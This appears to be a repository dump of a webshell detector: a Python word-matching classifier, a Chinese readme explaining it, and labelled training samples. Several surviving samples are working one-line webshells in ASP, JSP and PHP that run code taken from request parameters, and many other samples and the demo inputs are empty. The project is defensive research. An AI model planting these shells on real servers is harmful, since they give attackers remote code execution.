├── machine_learning_model.py
├── pic
├── sample_test.png
├── test.png
└── vector.png
├── readme.md
└── shell
├── normal-asp-code-0.asp
├── normal-jsp-code-0.jsp
├── normal-php-code-0.php
├── normal-php-code-1.php
├── normal-php-code-2.php
├── normal-php-code-3.php
├── shell-asp-eval-0.asp
├── shell-jsp-command-0.jsp
├── shell-php-assert-0.php
├── shell-php-assert-1.php
├── shell-php-assert-2.php
├── shell-php-assert-3.php
├── shell-php-assert-4.php
├── shell-php-call_user_func-0.php
├── shell-php-copy-0.php
├── shell-php-create_function-0.php
├── shell-php-create_function-1.php
├── shell-php-create_function-2.php
├── shell-php-create_function-3.php
├── shell-php-eval-0.php
├── shell-php-eval-1.php
├── shell-php-eval-2.php
├── shell-php-eval-3.php
├── shell-php-eval-4.php
├── shell-php-eval-5.php
├── shell-php-eval-6.php
├── shell-php-fwrite-0.php
├── shell-php-include-0.php
├── shell-php-include-1.php
├── shell-php-include-5.php
├── shell-php-popen-0.php
├── shell-php-preg_replace-0.php
├── shell-php-preg_replace-1.php
├── shell-php-preg_replace-2.php
├── shell-php-require-0.php
├── shell-php-require-4.php
└── shell-php-system-0.php
/machine_learning_model.py:
--------------------------------------------------------------------------------
1 |
2 | import math
3 | import os
4 | import sys
5 |
6 |
class shell_detect:
    """Classify source code by word overlap with labelled sample files.

    Samples are read from a directory, tokenised with
    ``code_word_to_vector`` and grouped by the first three ``-`` separated
    parts of their file name (for example ``shell-php-eval``).
    ``try_classify`` scores a piece of code against every stored sample
    and returns the label of the best-scoring one.
    """

    @staticmethod
    def read_file(file_path):
        """Return the whole content of ``file_path`` as a string.

        The file is opened in the platform's default text mode.  Errors
        raised by ``open`` or ``read`` propagate to the caller.
        """
        # ``with`` closes the handle even when read() raises.
        with open(file_path) as sample_file:
            return sample_file.read()

    @staticmethod
    def code_word_to_vector(php_code):
        """Split source code into the list of words used for scoring.

        * Every character of ``filter_flag_list`` is replaced by a space.
        * The text is split on whitespace, so tabs and ``\\n``, ``\\r`` and
          ``\\r\\n`` line endings all act as separators and never end up
          inside a word.
        * Each request super-global listed in ``keyword`` becomes the
          single word ``'$'``; every other word starting with ``'$'``
          (an ordinary variable) is dropped.

        Returns the remaining words in their original order; an empty
        input gives an empty list.
        """
        filter_flag_list = ['@', '[', ']', '(', ')', '{', '}', '\'', '"',
                            ',', ';', '=', '.']
        keyword = ('$_GET', '$_POST', '$_REQUEST', '$_COOKIE')

        for filter_flag in filter_flag_list:
            php_code = php_code.replace(filter_flag, ' ')

        vector = []

        # split() without arguments never yields empty items, so no
        # separate clean-up pass over the list is needed.
        for word in php_code.split():
            if word in keyword:
                vector.append('$')
            elif not word.startswith('$'):  # drop ordinary $variables
                vector.append(word)

        return vector

    @staticmethod
    def _report_bad_sample(file_name):
        """Print the notice for a sample file that could not be used."""
        print('Error Shell Sample File ! %s' % file_name)
        print('Sample File Name Format :')
        print('  normal-%shell_language%-%shell_type%-%shell_index%.php  or ')
        print('  shell-%shell_language%-%shell_type%-%shell_index%.php  ')

    @staticmethod
    def load_and_train_model(data_set_path='shell'):
        """Load every sample file found in ``data_set_path``.

        The label of a sample is the first three ``-`` separated parts of
        its file name joined by ``-`` again.  Entries whose name has fewer
        than three parts, or that cannot be read, are reported on stdout
        and skipped.

        Returns a dict mapping each label to the list of word vectors of
        its samples.  ``os.listdir`` errors (for example a missing
        directory) propagate to the caller.
        """
        shell_sample = {}  # label -> list of word vectors

        for file_name in os.listdir(data_set_path):
            name_parts = file_name.split('-')

            if len(name_parts) < 3:
                shell_detect._report_bad_sample(file_name)
                continue

            classfy_type = '-'.join(name_parts[:3])

            try:
                # os.path.join keeps the loader working on every platform;
                # a hard-coded backslash only forms a valid path on Windows.
                sample_code = shell_detect.read_file(
                    os.path.join(data_set_path, file_name))
            except Exception:
                # Best effort: one unreadable entry must not abort loading.
                shell_detect._report_bad_sample(file_name)
                continue

            shell_sample.setdefault(classfy_type, []).append(
                shell_detect.code_word_to_vector(sample_code))

        return shell_sample

    def __init__(self, data_set_path='shell'):
        """Load the samples in ``data_set_path`` into ``self.shell_sample``."""
        self.shell_sample = shell_detect.load_and_train_model(data_set_path)

    def try_classify(self, php_code):
        """Return the label whose best sample scores highest for ``php_code``.

        For one sample the score is
        ``(matches + alpha) / (2 * len(sample) + alpha)`` with ``alpha = 1``,
        where ``matches`` counts every pair of equal words between the
        tokenised ``php_code`` and the sample.  A label's score is the
        maximum over its samples.  On equal scores the label visited last
        wins.  Returns ``''`` when no samples are loaded.
        """
        alpha = 1

        # Count each word of the input once, so scoring a sample is a
        # single pass over that sample instead of one list.count() call
        # per input word.  The number of matching pairs is unchanged.
        word_count = {}

        for word in shell_detect.code_word_to_vector(php_code):
            word_count[word] = word_count.get(word, 0) + 1

        max_p_value = 0
        max_p_type_name = ''

        for type_name, sample_list in self.shell_sample.items():
            type_p_value = 0

            for sample_vector in sample_list:
                found_count = sum(word_count.get(word, 0)
                                  for word in sample_vector)
                p_value = (found_count + alpha) / float(len(sample_vector) * 2 + alpha)

                if p_value >= type_p_value:
                    type_p_value = p_value

            # ">=" keeps the original tie-break: the later label wins.
            if type_p_value >= max_p_value:
                max_p_value = type_p_value
                max_p_type_name = type_name

        return max_p_type_name
106 |
107 |
if __name__ == '__main__':
    # Load the samples from the default ``shell`` directory.
    model = shell_detect()

    if 2 == len(sys.argv):
        # One command-line argument: classify the file at that path.
        print('Shell Type : %s' % model.try_classify(shell_detect.read_file(sys.argv[1])))
    else:
        print('Test Sample ..')

        # Built-in demo inputs.  All ten are empty strings in this copy of
        # the file.
        # NOTE(review): presumably the original PHP snippets were lost;
        # confirm against upstream before relying on this demo.
        test_samples = (
            '',
            '',
            '',
            '',
            '',
            '',
            '',
            '',
            '',
            '',
        )

        for sample_code in test_samples:
            # A single pre-formatted argument prints the same text under
            # the Python 2 print statement and the Python 3 print function.
            print('Shell Type : %s' % model.try_classify(sample_code))
--------------------------------------------------------------------------------
/pic/sample_test.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lcatro/WebShell-Detect-By-Machine-Learning/94efa9a8d600f965f2d166721249c6a32b8ce17f/pic/sample_test.png
--------------------------------------------------------------------------------
/pic/test.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lcatro/WebShell-Detect-By-Machine-Learning/94efa9a8d600f965f2d166721249c6a32b8ce17f/pic/test.png
--------------------------------------------------------------------------------
/pic/vector.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/lcatro/WebShell-Detect-By-Machine-Learning/94efa9a8d600f965f2d166721249c6a32b8ce17f/pic/vector.png
--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
1 |
2 | ## 使用机器学习识别WebShell
3 |
4 | 学习样本在**shell** 目录,目前样本较少,疏漏之处在所难免,测试结果如下:
5 |
6 | 
7 |
8 | ## 实现原理
9 |
10 | 实现原理是使用朴素贝叶斯进行文本分类.分类的样本包含正常的代码与WebShell 代码,为了方便后面的阅读,可以先阅读下面两个链接:
11 |
12 | [朴素贝叶斯原理](http://blog.csdn.net/u012162613/article/details/48323777)
13 | [朴素贝叶斯分类文本](http://www.cnblogs.com/XBWer/archive/2014/07/13/3840736.html)
14 |
15 | 站在朴素贝叶斯算法来看,代码其实就是一串文本,我们要做的第一件事就是要对文本进行处理,变成算法可以处理的形式
16 |
17 | ```python
18 |
19 | def code_word_to_vector(php_code) :
20 | filter_flag_list = ['@','[',']','(',')','{','}','\'','"',',',';','=','.','\t','\n','\r\n']
21 | keyword = ['$_GET','$_POST','$_REQUEST','$_COOKIE']
22 |
23 | for filter_flag_index in filter_flag_list :
24 | php_code = php_code.replace(filter_flag_index,' ')
25 |
26 | vector = php_code.split(' ')
27 |
28 | for index in range(len(vector)) : # filter $ variant
29 | if vector[index].startswith('$') and not vector[index] in keyword :
30 | vector[index] = ''
31 | elif vector[index] in keyword :
32 | vector[index] = '$'
33 |
34 | while vector.count('') : # filter empty item ..
35 | vector.remove('')
36 |
37 | return vector
38 |
39 | ```
40 |
41 | 预处理代码的算法做下面的工作:
42 |
43 | 1. `filter_flag_list` 指的是即将要过滤掉的字符,把它们替换成空格;`keyword` 的意思是,只保留这些关键的全局变量,那些无用的变量全部去除掉,否则变量名的文本在样本中和被检测的代码中也出现的话会影响概率计算结果
44 | 2.以空格字符作为分隔符,分割出所有的文本
45 | 3.过滤PHP 变量,只允许全局变量($_GET ,$_POST ,$_REQUEST ,$_COOKIE )的出现
46 | 4.从已经处理好的文本列表里面去除空内容(这里受到空格分隔符的影响,会有很多这样的空白内容)
47 |
48 | 代码处理后的效果
49 |
50 | 
51 |
52 | 处理完成代码之后,下一步就是加载数据集,来看看代码
53 |
54 | ```python
55 |
56 | def load_and_train_model(data_set_path = 'shell') :
57 | file_list = os.listdir(data_set_path)
58 | shell_sample = {} # classfy set ..
59 |
60 | for file_index in file_list :
61 | try :
62 | file_information = file_index.split('-')
63 | classfy_type = file_information[0] + '-' + file_information[1] + '-' + file_information[2]
64 | php_code_vector = shell_detect.code_word_to_vector(shell_detect.read_file(data_set_path + '\\' + file_index))
65 |
66 | if not shell_sample.has_key(classfy_type) :
67 | shell_sample[classfy_type] = []
68 |
69 | shell_sample[classfy_type].append(php_code_vector)
70 | except :
71 | print 'Error Shell Sample File !' , file_index
72 | print 'Sample File Name Format :'
73 | print ' normal-%shell_language%-%shell_type%-%shell_index%.php or '
74 | print ' shell-%shell_language%-%shell_type%-%shell_index%.php '
75 |
76 | return shell_sample
77 |
78 | ```
79 |
80 | 加载数据集的代码主要做下面的工作:
81 |
82 | 1.根据指定的样本目录来读取训练的样本数据
83 | 2. 样本数据文件的命名中包含了正常的代码和WebShell 的类型,命名规则为:**样本类型-语言-代码类型-序号.扩展名**,命名为normal-php-code-0.php 的文件的意思是这个样本文件是正常的PHP 代码文件,最后的0 代表着样本文件序号;命名为shell-php-eval-0.php 的意思是PHP 的eval() 函数的WebShell 样本文件
84 | 3.把这些样本文件读取出来预处理一下再放到样本集中
85 |
86 | 样本数据加载完成之后,接下来就是要对我们需要检测的文件做一个分类,思路是判断检测文件在各个样本中出现的概率,找到最大概率的那个就是对应的代码类别
87 |
88 | ```python
89 |
90 | def try_classify(self,php_code) :
91 | php_code_vector = shell_detect.code_word_to_vector(php_code)
92 | alpha = 1
93 | p_list = {}
94 |
95 | for key_index in self.shell_sample.keys() :
96 | max_p_value = 0
97 |
98 | for shell_sample_index in self.shell_sample[key_index] :
99 | found_vector_in_shell_sample_count = 0
100 |
101 | for php_code_vector_index in php_code_vector :
102 | if php_code_vector_index in shell_sample_index :
103 | found_vector_in_shell_sample_count += shell_sample_index.count(php_code_vector_index)
104 |
105 | p_value = (found_vector_in_shell_sample_count + alpha) / float(len(shell_sample_index) * 2 + alpha)
106 |
107 | if p_value >= max_p_value :
108 | max_p_value = p_value
109 |
110 | p_list[key_index] = max_p_value
111 |
112 | max_p_value = 0
113 | max_p_type_name = ''
114 |
115 | for p_type_name_index in p_list.keys() :
116 | p_value = p_list[p_type_name_index]
117 |
118 | if p_value >= max_p_value :
119 | max_p_value = p_value
120 | max_p_type_name = p_type_name_index
121 |
122 | return max_p_type_name
123 |
124 | ```
125 |
126 | 分类函数的逻辑如下:
127 |
128 | 1.对要检测的代码进行预处理
129 | 2.遍历所有的样本文件,使用朴素贝叶斯算法对所有的样本进行概率计算
130 | 3.找到概率最大的那个样本的类别
131 | 4.返回最后分类的结果
132 |
133 | 代码处理与分类算法已经介绍完,样本也是重要的一部分,接下来我们来看一下样本的构造
134 |
135 | ```php
136 |
137 | // shell-php-eval-0.php
138 |
139 |
144 |
145 |
146 | // shell-php-eval-4.php
147 |
148 |
149 |
150 |
151 | // shell-php-create_function-3.php
152 |
153 |
160 |
161 |
162 | // shell-php-assert-1.php
163 |
164 |
165 |
166 |
167 | // shell-php-preg_replace-1.php
168 |
169 |
175 |
176 |
177 | // normal-php-code-0.php
178 |
179 |
184 |
185 |
186 | // normal-php-code-2.php
187 |
188 |
196 |
197 | ```
198 |
199 | 样本的构造基本上是使用已知的WebShell 并且做一个归类.正常的代码这里只使用一些简单的PHP 语句,如果没有正常的代码,会导致概率的判断全部都会归类到WebShell 代码的范畴.
200 |
201 | 测试样本
202 |
203 | ```python
204 |
205 | print 'Shell Type :' , model.try_classify('')
206 | print 'Shell Type :' , model.try_classify('')
207 | print 'Shell Type :' , model.try_classify('')
208 | print 'Shell Type :' , model.try_classify('')
209 | print 'Shell Type :' , model.try_classify('')
210 | print 'Shell Type :' , model.try_classify('')
211 | print 'Shell Type :' , model.try_classify('')
212 | print 'Shell Type :' , model.try_classify('')
213 | print 'Shell Type :' , model.try_classify('')
214 | print 'Shell Type :' , model.try_classify('')
215 |
216 | ```
217 |
218 | 测试结果
219 |
220 | 
221 |
222 |
--------------------------------------------------------------------------------
/shell/normal-asp-code-0.asp:
--------------------------------------------------------------------------------
1 |
2 | <%
3 |
4 | dim $a
5 |
6 | $a = 0
7 |
8 | %>
--------------------------------------------------------------------------------
/shell/normal-jsp-code-0.jsp:
--------------------------------------------------------------------------------
1 |
2 | <%
3 |
4 | int $i = 0;
5 |
6 | %>
7 |
--------------------------------------------------------------------------------
/shell/normal-php-code-0.php:
--------------------------------------------------------------------------------
1 |
2 |
7 |
--------------------------------------------------------------------------------
/shell/normal-php-code-1.php:
--------------------------------------------------------------------------------
1 |
2 |
10 |
--------------------------------------------------------------------------------
/shell/normal-php-code-2.php:
--------------------------------------------------------------------------------
1 |
2 |
10 |
--------------------------------------------------------------------------------
/shell/normal-php-code-3.php:
--------------------------------------------------------------------------------
1 |
2 |
12 |
--------------------------------------------------------------------------------
/shell/shell-asp-eval-0.asp:
--------------------------------------------------------------------------------
1 | <% eval request("chopper") %>
--------------------------------------------------------------------------------
/shell/shell-jsp-command-0.jsp:
--------------------------------------------------------------------------------
1 | <% Runtime.getRuntime().exec(request.getParameter("test")); %>
--------------------------------------------------------------------------------
/shell/shell-php-assert-0.php:
--------------------------------------------------------------------------------
1 |
2 |
6 |
--------------------------------------------------------------------------------
/shell/shell-php-assert-1.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/shell/shell-php-assert-2.php:
--------------------------------------------------------------------------------
1 |
2 |
5 |
--------------------------------------------------------------------------------
/shell/shell-php-assert-3.php:
--------------------------------------------------------------------------------
1 |
2 |
5 |
--------------------------------------------------------------------------------
/shell/shell-php-assert-4.php:
--------------------------------------------------------------------------------
1 |
2 |
9 |
--------------------------------------------------------------------------------
/shell/shell-php-call_user_func-0.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/shell/shell-php-copy-0.php:
--------------------------------------------------------------------------------
1 |
2 |
11 |
--------------------------------------------------------------------------------
/shell/shell-php-create_function-0.php:
--------------------------------------------------------------------------------
1 |
2 |
9 |
--------------------------------------------------------------------------------
/shell/shell-php-create_function-1.php:
--------------------------------------------------------------------------------
1 |
2 |
9 |
--------------------------------------------------------------------------------
/shell/shell-php-create_function-2.php:
--------------------------------------------------------------------------------
1 |
2 |
9 |
--------------------------------------------------------------------------------
/shell/shell-php-create_function-3.php:
--------------------------------------------------------------------------------
1 |
2 |
9 |
--------------------------------------------------------------------------------
/shell/shell-php-eval-0.php:
--------------------------------------------------------------------------------
1 |
2 |
7 |
--------------------------------------------------------------------------------
/shell/shell-php-eval-1.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/shell/shell-php-eval-2.php:
--------------------------------------------------------------------------------
1 |
2 | $code = '';
3 | foreach($_POST as $a){
4 | $code = $a;
5 | break;
6 | }
7 | eval($code);
8 | ?>
--------------------------------------------------------------------------------
/shell/shell-php-eval-3.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/shell/shell-php-eval-4.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/shell/shell-php-eval-5.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/shell/shell-php-eval-6.php:
--------------------------------------------------------------------------------
1 |
6 |
--------------------------------------------------------------------------------
/shell/shell-php-fwrite-0.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/shell/shell-php-include-0.php:
--------------------------------------------------------------------------------
1 |
2 | ');
5 |
6 | include 'code.php';
7 |
8 | ?>
9 |
--------------------------------------------------------------------------------
/shell/shell-php-include-1.php:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
--------------------------------------------------------------------------------
/shell/shell-php-include-5.php:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
--------------------------------------------------------------------------------
/shell/shell-php-popen-0.php:
--------------------------------------------------------------------------------
1 |
2 |
9 |
--------------------------------------------------------------------------------
/shell/shell-php-preg_replace-0.php:
--------------------------------------------------------------------------------
1 |
2 |
7 |
--------------------------------------------------------------------------------
/shell/shell-php-preg_replace-1.php:
--------------------------------------------------------------------------------
1 |
--------------------------------------------------------------------------------
/shell/shell-php-preg_replace-2.php:
--------------------------------------------------------------------------------
1 |
2 |
3 | @preg_replace("/f/e",$_GET['u'],"fengjiao");
4 |
5 | ?>
--------------------------------------------------------------------------------
/shell/shell-php-require-0.php:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
--------------------------------------------------------------------------------
/shell/shell-php-require-4.php:
--------------------------------------------------------------------------------
1 |
2 |
7 |
8 |
--------------------------------------------------------------------------------
/shell/shell-php-system-0.php:
--------------------------------------------------------------------------------
1 |
2 |
7 |
--------------------------------------------------------------------------------